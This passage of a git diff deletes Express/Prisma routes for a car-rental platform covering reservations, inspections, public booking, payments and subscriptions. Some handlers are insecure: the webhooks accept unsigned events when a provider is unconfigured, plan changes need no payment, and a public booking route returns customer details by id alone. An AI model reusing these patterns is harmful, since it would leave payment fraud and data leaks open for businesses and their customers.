companyName, vehicleLabel, reviewUrl } - - sendTransactionalEmail({ - to: customer.email, - subject: reviewRequestEmail.subject(vehicleLabel, lang), - html: reviewRequestEmail.html(reviewOpts, lang), - text: reviewRequestEmail.text(reviewOpts, lang), - }).catch(() => null) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/:id/close', async (req, res, next) => { - try { - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - }) - const workflow = buildReservationWorkflow(reservation) - - if (reservation.status !== 'COMPLETED') { - return res.status(400).json({ error: 'invalid_status', message: 'Only completed reservations can be closed', statusCode: 400 }) - } - - if (workflow.closed) { - return res.status(400).json({ error: 'already_closed', message: 'This reservation is already closed', statusCode: 400 }) - } - - const extras = parseReservationExtras(reservation.extras) - extras.reservationClosedAt = new Date().toISOString() - extras.reservationClosedBy = `${req.employee.firstName} ${req.employee.lastName}` - - const updated = await prisma.reservation.update({ - where: { id: reservation.id }, - data: { extras: extras as any }, - include: { vehicle: true, customer: true, insurances: true, additionalDrivers: true, rentalPayments: true, damageReports: true }, - }) - - res.json({ data: serializeReservationForDashboard(updated) }) - } catch (err) { next(err) } -}) - -router.post('/:id/cancel', async (req, res, next) => { - try { - const { reason } = z.object({ reason: z.string().optional() }).parse(req.body) - const reservation = await prisma.reservation.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - if (['COMPLETED', 'CANCELLED'].includes(reservation.status)) { - return res.status(400).json({ error: 'invalid_status', message: 'Reservation cannot be cancelled', statusCode: 400 }) - } - const updated = await prisma.reservation.update({ where: { id: req.params.id }, data: { status: 'CANCELLED', cancelReason: reason ?? null, cancelledBy: 'COMPANY' } }) - if (['CONFIRMED', 'ACTIVE'].includes(reservation.status)) { - await prisma.vehicle.update({ where: { id: reservation.vehicleId }, data: { status: 'AVAILABLE' } }) - } - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.get('/:id/billing', async (req, res, next) => { - try { - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true, insurances: true, additionalDrivers: true }, - }) - - const baseAmount = reservation.dailyRate * reservation.totalDays - const lineItems = [ - { description: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model} — ${reservation.totalDays} day(s)`, qty: reservation.totalDays, unitPrice: reservation.dailyRate, total: baseAmount, category: 'RENTAL' }, - ...reservation.insurances.map((ins: (typeof reservation.insurances)[number]) => ({ description: ins.policyName, qty: ins.chargeType === 'PER_DAY' ? reservation.totalDays : 1, unitPrice: ins.chargeType === 'PER_DAY' ? ins.chargeValue : ins.totalCharge, total: ins.totalCharge, category: 'INSURANCE' })), - ...reservation.additionalDrivers.filter((d: (typeof reservation.additionalDrivers)[number]) => d.totalCharge > 0).map((d: (typeof reservation.additionalDrivers)[number]) => ({ description: `Additional Driver — ${d.firstName} ${d.lastName}`, qty: 1, unitPrice: d.totalCharge, total: d.totalCharge, category: 'ADDITIONAL_DRIVER' })), - ...(reservation.depositAmount > 0 ? [{ description: 'Security Deposit (refundable)', qty: 1, unitPrice: reservation.depositAmount, total: reservation.depositAmount, category: 'DEPOSIT' }] : []), - ] - - const grandTotal = lineItems.reduce((s, i) => s + i.total, 0) - reservation.discountAmount - - res.json({ data: { lineItems, discountAmount: reservation.discountAmount, pricingRulesApplied: reservation.pricingRulesApplied, pricingRulesTotal: reservation.pricingRulesTotal, grandTotal } }) - } catch (err) { next(err) } -}) - -router.get('/:id/inspections', async (req, res, next) => { - try { - const inspections = await prisma.damageInspection.findMany({ - where: { reservationId: req.params.id, companyId: req.companyId }, - include: { damagePoints: true }, - orderBy: { inspectedAt: 'asc' }, - }) - res.json({ data: inspections }) - } catch (err) { next(err) } -}) - -router.put('/:id/inspections/:type', async (req, res, next) => { - try { - const type = z.enum(['CHECKIN', 'CHECKOUT']).parse(req.params.type.toUpperCase()) - const body = inspectionSchema.parse(req.body) - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { vehicle: true, customer: true }, - }) - const workflow = buildReservationWorkflow(reservation) - - if (workflow.closed) { - return res.status(400).json({ error: 'reservation_closed', message: 'This reservation has already been closed', statusCode: 400 }) - } - - if (type === 'CHECKIN' && !workflow.checkInInspectionEditable) { - return res.status(400).json({ error: 'invalid_status', message: 'Check-in inspection is not editable at this stage', statusCode: 400 }) - } - - if (type === 'CHECKOUT' && !workflow.checkOutInspectionEditable) { - return res.status(400).json({ error: 'invalid_status', message: 'Check-out inspection is only editable after the vehicle is returned', statusCode: 400 }) - } - - const inspection = await prisma.damageInspection.upsert({ - where: { reservationId_type: { reservationId: reservation.id, type } }, - update: { - mileage: body.mileage ?? null, - fuelLevel: body.fuelLevel, - fuelCharge: body.fuelCharge ?? null, - generalCondition: body.generalCondition ?? null, - employeeNotes: body.employeeNotes ?? null, - customerAgreed: body.customerAgreed, - inspectedBy: `${req.employee.firstName} ${req.employee.lastName}`, - inspectedAt: new Date(), - damagePoints: { - deleteMany: {}, - create: body.damagePoints, - }, - }, - create: { - reservationId: reservation.id, - companyId: req.companyId, - type, - mileage: body.mileage ?? null, - fuelLevel: body.fuelLevel, - fuelCharge: body.fuelCharge ?? null, - generalCondition: body.generalCondition ?? null, - employeeNotes: body.employeeNotes ?? null, - customerAgreed: body.customerAgreed, - inspectedBy: `${req.employee.firstName} ${req.employee.lastName}`, - damagePoints: { - create: body.damagePoints, - }, - }, - include: { damagePoints: true }, - }) - - await prisma.damageReport.upsert({ - where: { reservationId_type: { reservationId: reservation.id, type } }, - update: { - damages: body.damagePoints.map((point) => ({ - viewType: point.viewType, - x: point.x, - y: point.y, - damageType: point.damageType, - severity: point.severity, - note: point.description ?? '', - isPreExisting: point.isPreExisting, - })), - fuelLevel: body.fuelLevel, - mileage: body.mileage ?? null, - inspectedAt: new Date(), - inspectedBy: `${req.employee.firstName} ${req.employee.lastName}`, - customerSignedAt: body.customerAgreed ? new Date() : null, - customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, - }, - create: { - reservationId: reservation.id, - companyId: req.companyId, - type, - damages: body.damagePoints.map((point) => ({ - viewType: point.viewType, - x: point.x, - y: point.y, - damageType: point.damageType, - severity: point.severity, - note: point.description ?? '', - isPreExisting: point.isPreExisting, - })), - photos: [], - fuelLevel: body.fuelLevel, - mileage: body.mileage ?? null, - inspectedAt: new Date(), - inspectedBy: `${req.employee.firstName} ${req.employee.lastName}`, - customerSignedAt: body.customerAgreed ? new Date() : null, - customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, - }, - }) - - await prisma.reservation.update({ - where: { id: reservation.id }, - data: type === 'CHECKIN' - ? { - checkInMileage: body.mileage ?? null, - checkInFuelLevel: body.fuelLevel, - } - : { - checkOutMileage: body.mileage ?? null, - checkOutFuelLevel: body.fuelLevel, - }, - }) - - res.json({ data: inspection }) - } catch (err) { next(err) } -}) - -router.patch('/:id/additional-drivers/:driverId/approval', async (req, res, next) => { - try { - const { approved, note } = z.object({ approved: z.boolean(), note: z.string().optional() }).parse(req.body) - const driver = await prisma.additionalDriver.findFirstOrThrow({ - where: { id: req.params.driverId, reservationId: req.params.id, companyId: req.companyId }, - }) - - const updated = await prisma.additionalDriver.update({ - where: { id: driver.id }, - data: { - approvedAt: approved ? new Date() : null, - approvedBy: approved ? `${req.employee.firstName} ${req.employee.lastName}` : null, - approvalNote: note ?? driver.approvalNote, - }, - }) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/site.ts b/apps/api/src/routes/site.ts deleted file mode 100644 index 3d83db6..0000000 --- a/apps/api/src/routes/site.ts +++ /dev/null @@ -1,522 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { applyAdditionalDriversToReservation } from '../services/additionalDriverService' -import * as amanpay from '../services/amanpayService' -import { applyInsurancesToReservation } from '../services/insuranceService' -import { applyPricingRules } from '../services/pricingRuleService' -import { validateAndFlagLicense, validateLicense } from '../services/licenseValidationService' -import * as paypal from '../services/paypalService' -import { getMarketplaceHomepageContent } from '../services/platformContentService' -import { getVehicleAvailabilitySummary } from '../services/vehicleAvailabilityService' - -const router = Router() - -router.get('/platform/homepage', async (_req, res, next) => { - try { - res.json({ data: await getMarketplaceHomepageContent() }) - } catch (err) { - next(err) - } -}) - -function isDatabaseUnavailableError(error: unknown): boolean { - if (!error || typeof error !== 'object') return false - - const candidate = error as { code?: string; message?: string } - return candidate.code === 'P1001' || candidate.message?.includes("Can't reach database server") === true -} - -async function findCompanyBySlug(slug: string) { - return prisma.company.findFirstOrThrow({ - where: { slug, status: { in: ['ACTIVE', 'TRIALING', 'PAST_DUE', 'SUSPENDED'] } }, - include: { brand: true, contractSettings: true }, - }) -} - -router.get('/:slug/brand', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - res.json({ - data: { - company: { - id: company.id, - slug: company.slug, - name: company.name, - phone: company.phone, - }, - brand: company.brand, - }, - }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.json({ - data: { - company: { id: 'demo', slug: req.params.slug, name: 'Demo Company', phone: null }, - brand: null, - }, - }) - } - next(err) - } -}) - -router.get('/:slug/vehicles', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const vehicles = await prisma.vehicle.findMany({ - where: { companyId: company.id, isPublished: true }, - orderBy: { createdAt: 'desc' }, - }) - const enrichedVehicles = await Promise.all( - vehicles.map(async (vehicle) => { - const availability = await getVehicleAvailabilitySummary(vehicle.id) - return { - ...vehicle, - availability: availability.available, - availabilityStatus: availability.status, - nextAvailableAt: availability.nextAvailableAt, - } - }), - ) - res.json({ data: enrichedVehicles }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/:slug/vehicles/:id', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const vehicle = await prisma.vehicle.findFirstOrThrow({ - where: { id: req.params.id, companyId: company.id, isPublished: true }, - }) - const availability = await getVehicleAvailabilitySummary(vehicle.id) - res.json({ data: { ...vehicle, availability: availability.available, availabilityStatus: availability.status, nextAvailableAt: availability.nextAvailableAt } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Vehicle details are temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.get('/:slug/offers', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const offers = await prisma.offer.findMany({ - where: { - companyId: company.id, - isActive: true, - validFrom: { lte: new Date() }, - validUntil: { gte: new Date() }, - }, - orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], - }) - res.json({ data: offers }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) - next(err) - } -}) - -router.get('/:slug/booking-options', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const insurancePolicies = await prisma.insurancePolicy.findMany({ - where: { companyId: company.id, isActive: true }, - orderBy: [{ isRequired: 'desc' }, { sortOrder: 'asc' }, { name: 'asc' }], - }) - - res.json({ - data: { - insurancePolicies, - contractSettings: company.contractSettings, - }, - }) - } catch (err) { - if (isDatabaseUnavailableError(err)) return res.json({ data: { insurancePolicies: [], contractSettings: null } }) - next(err) - } -}) - -router.post('/:slug/availability', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const { vehicleId, startDate, endDate } = z.object({ - vehicleId: z.string().cuid(), - startDate: z.string().datetime(), - endDate: z.string().datetime(), - }).parse(req.body) - - const availability = await getVehicleAvailabilitySummary(vehicleId, { - range: { startDate: new Date(startDate), endDate: new Date(endDate) }, - }) - res.json({ data: { available: availability.available, nextAvailableAt: availability.nextAvailableAt } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Availability checks are temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.post('/:slug/book/validate-code', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const { code } = z.object({ code: z.string().min(1) }).parse(req.body) - const offer = await prisma.offer.findFirst({ - where: { - companyId: company.id, - promoCode: code, - isActive: true, - validFrom: { lte: new Date() }, - validUntil: { gte: new Date() }, - }, - }) - if (!offer) { - return res.status(404).json({ error: 'invalid_code', message: 'Promo code not found or expired', statusCode: 404 }) - } - res.json({ data: offer }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Promo code validation is temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.post('/:slug/book', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const body = z.object({ - vehicleId: z.string().cuid(), - startDate: z.string().datetime(), - endDate: z.string().datetime(), - firstName: z.string().min(1), - lastName: z.string().min(1), - email: z.string().email(), - phone: z.string().optional(), - driverLicense: z.string().optional(), - dateOfBirth: z.string().datetime().optional(), - licenseExpiry: z.string().datetime().optional(), - licenseIssuedAt: z.string().datetime().optional(), - nationality: z.string().optional(), - offerId: z.string().cuid().optional(), - promoCodeUsed: z.string().optional(), - notes: z.string().optional(), - source: z.enum(['PUBLIC_SITE', 'MARKETPLACE']).default('PUBLIC_SITE'), - selectedInsurancePolicyIds: z.array(z.string()).default([]), - additionalDrivers: z.array(z.object({ - firstName: z.string().min(1), - lastName: z.string().min(1), - email: z.string().email().optional(), - phone: z.string().optional(), - driverLicense: z.string().min(1), - licenseExpiry: z.string().datetime().optional(), - licenseIssuedAt: z.string().datetime().optional(), - dateOfBirth: z.string().datetime().optional(), - nationality: z.string().optional(), - })).default([]), - }).parse(req.body) - - const vehicle = await prisma.vehicle.findFirstOrThrow({ - where: { id: body.vehicleId, companyId: company.id, isPublished: true }, - }) - const start = new Date(body.startDate) - const end = new Date(body.endDate) - if (end <= start) { - return res.status(400).json({ error: 'invalid_dates', message: 'End date must be after start date', statusCode: 400 }) - } - - const availability = await getVehicleAvailabilitySummary(vehicle.id, { - range: { startDate: start, endDate: end }, - }) - if (!availability.available) { - return res.status(409).json({ - error: 'unavailable', - message: 'Vehicle is not available for the selected dates', - statusCode: 409, - nextAvailableAt: availability.nextAvailableAt?.toISOString() ?? null, - }) - } - - const customer = await prisma.customer.upsert({ - where: { companyId_email: { companyId: company.id, email: body.email } }, - update: { - firstName: body.firstName, - lastName: body.lastName, - phone: body.phone ?? null, - driverLicense: body.driverLicense ?? null, - dateOfBirth: body.dateOfBirth ? new Date(body.dateOfBirth) : null, - licenseExpiry: body.licenseExpiry ? new Date(body.licenseExpiry) : null, - licenseIssuedAt: body.licenseIssuedAt ? new Date(body.licenseIssuedAt) : null, - nationality: body.nationality ?? null, - }, - create: { - companyId: company.id, - firstName: body.firstName, - lastName: body.lastName, - email: body.email, - phone: body.phone ?? null, - driverLicense: body.driverLicense ?? null, - dateOfBirth: body.dateOfBirth ? new Date(body.dateOfBirth) : null, - licenseExpiry: body.licenseExpiry ? new Date(body.licenseExpiry) : null, - licenseIssuedAt: body.licenseIssuedAt ? new Date(body.licenseIssuedAt) : null, - nationality: body.nationality ?? null, - }, - }) - const totalDays = Math.max(1, Math.ceil((end.getTime() - start.getTime()) / 86400000)) - const baseAmount = vehicle.dailyRate * totalDays - - let discountAmount = 0 - if (body.promoCodeUsed) { - const offer = await prisma.offer.findFirst({ - where: { - companyId: company.id, - promoCode: body.promoCodeUsed, - isActive: true, - validFrom: { lte: new Date() }, - validUntil: { gte: new Date() }, - }, - }) - if (offer) { - if (offer.type === 'PERCENTAGE') discountAmount = Math.round(baseAmount * offer.discountValue / 100) - else if (offer.type === 'FIXED_AMOUNT') discountAmount = offer.discountValue - else if (offer.type === 'FREE_DAY') discountAmount = vehicle.dailyRate * offer.discountValue - } - } - - const { applied, total: pricingRulesTotal } = await applyPricingRules( - company.id, - customer.id, - body.additionalDrivers as any[], - vehicle.dailyRate, - totalDays, - ) - - const primaryLicenseResult = validateLicense(body.licenseExpiry ? new Date(body.licenseExpiry) : null) - if (primaryLicenseResult.status === 'EXPIRED') { - return res.status(400).json({ error: 'license_expired', message: 'The primary driver license is expired', statusCode: 400 }) - } - - const reservation = await prisma.reservation.create({ - data: { - companyId: company.id, - vehicleId: vehicle.id, - customerId: customer.id, - offerId: body.offerId ?? null, - promoCodeUsed: body.promoCodeUsed ?? null, - vehicleCategory: vehicle.category, - source: body.source, - startDate: start, - endDate: end, - dailyRate: vehicle.dailyRate, - totalDays, - totalAmount: baseAmount - discountAmount + pricingRulesTotal, - discountAmount, - pricingRulesApplied: applied, - pricingRulesTotal, - notes: body.notes ?? null, - status: 'DRAFT', - }, - }) - - if (body.selectedInsurancePolicyIds.length > 0) { - await applyInsurancesToReservation(reservation.id, company.id, body.selectedInsurancePolicyIds, totalDays, baseAmount) - } - - if (body.additionalDrivers.length > 0) { - await applyAdditionalDriversToReservation(reservation.id, company.id, body.additionalDrivers, totalDays) - } - - if (body.licenseExpiry) { - await validateAndFlagLicense(customer.id).catch(() => null) - } - - const refreshedReservation = await prisma.reservation.findUniqueOrThrow({ - where: { id: reservation.id }, - include: { insurances: true, additionalDrivers: true }, - }) - - res.status(201).json({ - data: { - ...refreshedReservation, - requiresManualApproval: - primaryLicenseResult.requiresApproval || - refreshedReservation.additionalDrivers.some((driver) => driver.requiresApproval), - }, - }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Booking is temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.get('/:slug/booking/:id', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: company.id }, - include: { vehicle: true, customer: true }, - }) - res.json({ data: reservation }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Booking details are temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.post('/:slug/booking/:id/pay', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const reservation = await prisma.reservation.findFirstOrThrow({ - where: { id: req.params.id, companyId: company.id }, - include: { vehicle: true, customer: true, additionalDrivers: true }, - }) - - if (reservation.paymentStatus === 'PAID') { - return res.status(409).json({ error: 'already_paid', message: 'This reservation is already paid', statusCode: 409 }) - } - - const customerLicenseResult = validateLicense(reservation.customer.licenseExpiry) - if ( - reservation.customer.licenseValidationStatus === 'DENIED' || - customerLicenseResult.status === 'EXPIRED' || - (customerLicenseResult.requiresApproval && reservation.customer.licenseValidationStatus !== 'APPROVED') || - reservation.additionalDrivers.some((driver) => driver.licenseExpired || (driver.requiresApproval && !driver.approvedAt)) - ) { - return res.status(409).json({ - error: 'license_review_required', - message: 'This reservation requires license review before payment can be processed', - statusCode: 409, - }) - } - - const { provider, currency, successUrl, failureUrl } = z.object({ - provider: z.enum(['AMANPAY', 'PAYPAL']), - currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), - successUrl: z.string().url(), - failureUrl: z.string().url(), - }).parse(req.body) - - const amount = reservation.totalAmount - const description = `Rental: ${reservation.vehicle.make} ${reservation.vehicle.model}` - const orderId = `res-${reservation.id}-${Date.now()}` - const webhookBase = process.env.API_URL ?? 'http://localhost:4000' - - let checkoutUrl: string - let amanpayTransactionId: string | null = null - let paypalCaptureId: string | null = null - - if (provider === 'AMANPAY') { - if (!amanpay.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'Online payment is not available for this company', statusCode: 503 }) - } - const brand = company.brand as any - const merchantId = brand?.amanpayMerchantId ?? process.env.AMANPAY_MERCHANT_ID ?? '' - const secretKey = brand?.amanpaySecretKey ?? process.env.AMANPAY_SECRET_KEY ?? '' - if (!merchantId || !secretKey) { - return res.status(503).json({ error: 'provider_not_configured', message: 'AmanPay is not configured for this company', statusCode: 503 }) - } - const result = await amanpay.createCheckout({ - amount, - currency, - orderId, - description, - customerEmail: reservation.customer.email, - customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, - successUrl, - failureUrl, - webhookUrl: `${webhookBase}/api/v1/payments/webhooks/amanpay`, - }) - checkoutUrl = result.checkoutUrl - amanpayTransactionId = result.transactionId - } else { - if (!paypal.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'PayPal is not available for this company', statusCode: 503 }) - } - const result = await paypal.createOrder({ - amount, - currency, - orderId, - description, - returnUrl: successUrl, - cancelUrl: failureUrl, - }) - checkoutUrl = result.approveUrl - paypalCaptureId = result.orderId - } - - await prisma.rentalPayment.create({ - data: { - companyId: company.id, - reservationId: reservation.id, - amount, - currency, - status: 'PENDING', - type: 'CHARGE', - paymentProvider: provider, - amanpayTransactionId, - paypalCaptureId, - }, - }) - - res.json({ data: { checkoutUrl } }) - } catch (err) { - if (isDatabaseUnavailableError(err)) { - return res.status(503).json({ error: 'database_unavailable', message: 'Payment initiation is temporarily unavailable', statusCode: 503 }) - } - next(err) - } -}) - -router.post('/:slug/booking/:id/capture-paypal', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const { paypalOrderId } = z.object({ paypalOrderId: z.string() }).parse(req.body) - - const payment = await prisma.rentalPayment.findFirstOrThrow({ - where: { paypalCaptureId: paypalOrderId, companyId: company.id }, - }) - - const capture = await paypal.captureOrder(paypalOrderId) as Record - const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId - - await prisma.rentalPayment.update({ - where: { id: payment.id }, - data: { status: 'SUCCEEDED', paidAt: new Date(), paypalCaptureId: captureId }, - }) - await prisma.reservation.update({ - where: { id: payment.reservationId }, - data: { paymentStatus: 'PAID', paidAmount: { increment: payment.amount } }, - }) - - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/:slug/contact', async (req, res, next) => { - try { - const company = await findCompanyBySlug(req.params.slug) - const body = z.object({ - name: z.string().min(1), - email: z.string().email(), - message: z.string().min(1), - }).parse(req.body) - res.json({ - data: { - success: true, - deliveredTo: company.brand?.publicEmail ?? company.email, - preview: body, - }, - }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/subscriptions.ts b/apps/api/src/routes/subscriptions.ts deleted file mode 100644 index 6a23fd4..0000000 --- a/apps/api/src/routes/subscriptions.ts +++ /dev/null @@ -1,298 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { PLAN_PRICES } from '@rentaldrivego/types' -import { prisma } from '../lib/prisma' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireRole } from '../middleware/requireRole' -import * as amanpay from '../services/amanpayService' -import * as paypal from '../services/paypalService' - -const router = Router() - -router.get('/plans', (_req, res) => { - res.json({ data: PLAN_PRICES }) -}) - -router.get('/providers', (_req, res) => { - res.json({ - data: { - amanpay: amanpay.isConfigured(), - paypal: paypal.isConfigured(), - }, - }) -}) - -// ─── AmanPay subscription webhook (no auth) ────────────────────────────────── - -router.post('/webhooks/amanpay', async (req, res, next) => { - try { - const rawBody = JSON.stringify(req.body) - const signature = req.headers['x-amanpay-signature'] as string ?? '' - - if (amanpay.isConfigured() && !amanpay.verifyWebhookSignature(rawBody, signature)) { - return res.status(401).json({ error: 'invalid_signature' }) - } - - const event = req.body - const transactionId = event.transaction_id ?? event.id - const status = event.status?.toUpperCase() - - if (status === 'PAID' || status === 'SUCCEEDED') { - const invoice = await prisma.subscriptionInvoice.findFirst({ - where: { amanpayTransactionId: transactionId }, - include: { subscription: true }, - }) - if (invoice) { - await prisma.subscriptionInvoice.update({ - where: { id: invoice.id }, - data: { status: 'PAID', paidAt: new Date() }, - }) - await prisma.subscription.update({ - where: { id: invoice.subscriptionId }, - data: { - status: 'ACTIVE', - currentPeriodStart: new Date(), - currentPeriodEnd: addPeriod(new Date(), invoice.subscription.billingPeriod), - }, - }) - } - } - - res.json({ received: true }) - } catch (err) { next(err) } -}) - -// ─── PayPal subscription webhook (no auth) ─────────────────────────────────── - -router.post('/webhooks/paypal', async (req, res, next) => { - try { - const rawBody = JSON.stringify(req.body) - const isValid = await paypal.verifyWebhookEvent(req.headers as Record, rawBody) - if (paypal.isConfigured() && !isValid) { - return res.status(401).json({ error: 'invalid_signature' }) - } - - const event = req.body - if (event.event_type === 'PAYMENT.CAPTURE.COMPLETED') { - const captureId = event.resource?.id as string - const invoice = await prisma.subscriptionInvoice.findFirst({ - where: { paypalCaptureId: captureId }, - include: { subscription: true }, - }) - if (invoice) { - await prisma.subscriptionInvoice.update({ - where: { id: invoice.id }, - data: { status: 'PAID', paidAt: new Date() }, - }) - await prisma.subscription.update({ - where: { id: invoice.subscriptionId }, - data: { - status: 'ACTIVE', - currentPeriodStart: new Date(), - currentPeriodEnd: addPeriod(new Date(), invoice.subscription.billingPeriod), - }, - }) - } - } - - res.json({ received: true }) - } catch (err) { next(err) } -}) - -// ─── PayPal capture redirect (no full auth needed — just valid session) ─────── - -router.post('/capture-paypal', requireCompanyAuth, requireTenant, async (req, res, next) => { - try { - const { paypalOrderId } = z.object({ paypalOrderId: z.string() }).parse(req.body) - - const invoice = await prisma.subscriptionInvoice.findFirstOrThrow({ - where: { paypalCaptureId: paypalOrderId, companyId: req.companyId }, - include: { subscription: true }, - }) - - const capture = await paypal.captureOrder(paypalOrderId) as Record - const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId - - await prisma.subscriptionInvoice.update({ - where: { id: invoice.id }, - data: { status: 'PAID', paidAt: new Date(), paypalCaptureId: captureId }, - }) - await prisma.subscription.update({ - where: { id: invoice.subscriptionId }, - data: { - status: 'ACTIVE', - currentPeriodStart: new Date(), - currentPeriodEnd: addPeriod(new Date(), invoice.subscription.billingPeriod), - }, - }) - - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -// ─── Authenticated subscription routes ─────────────────────────────────────── - -router.use(requireCompanyAuth, requireTenant) - -router.get('/me', async (req, res, next) => { - try { - const subscription = await prisma.subscription.findUnique({ - where: { companyId: req.companyId }, - include: { invoices: { orderBy: { createdAt: 'desc' }, take: 12 } }, - }) - res.json({ data: subscription }) - } catch (err) { next(err) } -}) - -router.get('/invoices', async (req, res, next) => { - try { - const invoices = await prisma.subscriptionInvoice.findMany({ - where: { companyId: req.companyId }, - orderBy: { createdAt: 'desc' }, - take: 50, - }) - res.json({ data: invoices }) - } catch (err) { next(err) } -}) - -const checkoutSchema = z.object({ - plan: z.enum(['STARTER', 'GROWTH', 'PRO']), - billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), - currency: z.enum(['MAD', 'USD', 'EUR']), - provider: z.enum(['AMANPAY', 'PAYPAL']), - successUrl: z.string().url(), - failureUrl: z.string().url(), -}) - -router.post('/checkout', requireRole('OWNER'), async (req, res, next) => { - try { - const body = checkoutSchema.parse(req.body) - const prices = PLAN_PRICES[body.plan]?.[body.billingPeriod] - if (!prices) return res.status(400).json({ error: 'invalid_plan', message: 'Invalid plan or billing period', statusCode: 400 }) - const amount = prices[body.currency] - if (!amount) return res.status(400).json({ error: 'invalid_currency', message: 'Currency not supported for this plan', statusCode: 400 }) - - const company = await prisma.company.findUniqueOrThrow({ where: { id: req.companyId } }) - - let subscription = await prisma.subscription.findUnique({ where: { companyId: req.companyId } }) - if (!subscription) { - subscription = await prisma.subscription.create({ - data: { - companyId: req.companyId, - plan: body.plan, - billingPeriod: body.billingPeriod, - currency: body.currency, - status: 'PENDING' as any, - }, - }) - } - - const orderId = `sub-${req.companyId}-${Date.now()}` - const description = `${body.plan} plan — ${body.billingPeriod}` - const webhookBase = process.env.API_URL ?? 'http://localhost:4000' - - let checkoutUrl: string - let amanpayTransactionId: string | null = null - let paypalCaptureId: string | null = null - - if (body.provider === 'AMANPAY') { - if (!amanpay.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'AmanPay is not configured on this platform', statusCode: 503 }) - } - const result = await amanpay.createCheckout({ - amount, - currency: body.currency, - orderId, - description, - customerEmail: company.email, - customerName: company.name, - successUrl: body.successUrl, - failureUrl: body.failureUrl, - webhookUrl: `${webhookBase}/api/v1/subscriptions/webhooks/amanpay`, - }) - checkoutUrl = result.checkoutUrl - amanpayTransactionId = result.transactionId - } else { - if (!paypal.isConfigured()) { - return res.status(503).json({ error: 'provider_not_configured', message: 'PayPal is not configured on this platform', statusCode: 503 }) - } - const result = await paypal.createOrder({ - amount, - currency: body.currency, - orderId, - description, - returnUrl: body.successUrl, - cancelUrl: body.failureUrl, - }) - checkoutUrl = result.approveUrl - paypalCaptureId = result.orderId - } - - const invoice = await prisma.subscriptionInvoice.create({ - data: { - companyId: req.companyId, - subscriptionId: subscription.id, - amount, - currency: body.currency, - status: 'PENDING', - paymentProvider: body.provider, - amanpayTransactionId, - paypalCaptureId, - }, - }) - - res.json({ data: { invoice, checkoutUrl } }) - } catch (err) { next(err) } -}) - -router.post('/change-plan', requireRole('OWNER'), async (req, res, next) => { - try { - const { plan, billingPeriod, currency } = z.object({ - plan: z.enum(['STARTER', 'GROWTH', 'PRO']), - billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), - currency: z.enum(['MAD', 'USD', 'EUR']), - }).parse(req.body) - - const updated = await prisma.subscription.update({ - where: { companyId: req.companyId }, - data: { plan, billingPeriod, currency }, - }) - - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/cancel', requireRole('OWNER'), async (req, res, next) => { - try { - const updated = await prisma.subscription.update({ - where: { companyId: req.companyId }, - data: { cancelAtPeriodEnd: true }, - }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.post('/resume', requireRole('OWNER'), async (req, 